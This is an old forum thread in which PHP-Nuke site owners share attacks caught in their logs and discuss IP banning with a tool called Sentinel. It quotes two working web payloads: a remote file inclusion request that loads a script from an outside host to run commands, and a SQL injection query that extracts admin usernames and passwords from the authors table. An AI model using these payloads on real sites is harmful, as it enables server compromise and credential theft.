Caught my first "hacker"

Posted: Wed Jun 02, 2004 12:05 am

Wow im supprised now.. I do beleive this is a fake thing to, thats what my friend told me.

Heres what they did..
/index.php?file=http://www.angelfire.com/linux/arplhmd/exec.php&cmd=id

Is that a valid hack.. Ill post their ip if you want too.

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

May be an attempt to steal your cookie. This is a very old exploit. Go ahead and post the IP. The kids from Brazil were using this many months ago.

Posted: Wed Jun 02, 2004 9:59 am

Yep is was them, dont be have the ability to ban ip ranges yet Wink

Who-Is for IP
200.227.112.48

OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer: whois://whois.lacnic.net

NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
NameServer: NS2.DNS.BR
Comment: This IP address range is under LACNIC responsibility for further
Comment: allocations to users in LACNIC region.
Comment: Please see http://www.lacnic.net/ for further details, or check the
Comment: WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2004-03-18

TechHandle: LACNIC-ARIN
TechName: LACNIC Hostmaster
TechPhone: (+55) 11 5509-3522
TechEmail: abuse@lacnic.net

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail: abuse@lacnic.net

Posted: Wed Jun 02, 2004 10:01 am

Oh and darn.. I frogot to turn the pc killer on...

Posted: Thu Jun 03, 2004 11:30 am

Raven I think that it would be a great idea for you to start a public shame list on your site. Mabye a module that everyone could add ip's to and get an sql dump to add right into sentinel.

Could that work?

Posted: Thu Jun 03, 2004 11:38 am

If the majority of IP's were static then maybe. The thing is, most IP's, especially those being used by crackers, are either dhcp, forged, or proxied, and aren't worth much other than to report to the abuse links of the ISP that was used. In theory it sounds good but in practice I'm not sure it ultimately achieves the intended goal. But, never one to stifle creativity Smile

Let's see what others have to say!

Regular Joined: May 31, 2004 Posts: 95 Location: NY

Might be useful in the wrong run. If duplicate IPs surfice in the list... have a running tally on the common ones then.

Regular Joined: Aug 23, 2003 Posts: 77

200.0.0 to 200.255.255 is leading Hacker IP. what these people teach to do? hacking?

Posted: Thu Jun 03, 2004 12:50 pm

And 210.0.0 to 210.255.255 (thanks to bob for telling me that)

registered · Posted: Thu Jun 03, 2004 1:09 pm

1 persons enemy might not be another's. Don't want those htaccess files getting over bulky. Smile

Mine is already huge... my htaccess is pretty big too. Laughing

Posted: Thu Jun 03, 2004 1:10 pm

Oh i dont even use the htaccess file bc my host dosent support it.. but im sure when i move to raven's hosting in october ill use it Wink

Posted: Fri Jun 04, 2004 6:30 am

stephen2417 wrote:

Yep is was them, dont be have the ability to ban ip ranges yet Wink

Who-Is for IP
200.227.112.48

I think they said you could put in 200.0.0.0 and that would block the entire IP range.....with 1.2.0, I think it might even accept 200.*.*.* .... someone correct me if I am wrong tho.....

Posted: Fri Jun 04, 2004 6:43 am

It has always had the ability to ban at any level of octet. And with v1.2 either 200.*.*.* or 200.0.0.0 will work.

Posted: Fri Jun 04, 2004 1:32 pm

Why must hackers be so dumb.. Yet another silly silly mistake. They did a union on my downloads and i dont even have them active.. I mean HELLO...
Query String: /modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

Who-Is for IP
202.156.229.91

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

ReferralServer: whois://whois.apnic.net

NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7
NetName: APNIC-CIDR-BLK
NetHandle: NET-202-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS.RIPE.NET
NameServer: DNS1.TELSTRA.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to http://www.apnic.net/info/faq/abuse
Comment:
RegDate: 1994-04-05
Updated: 2004-03-30

OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3100
OrgTechEmail: search-apnic-not-arin@apnic.net

Dont worry they missed the banner on my home page im sure they understand what Sentinel™ Protected means now. They are burning in hell along with popups of death Twisted Evil

(Sorry am i evil?)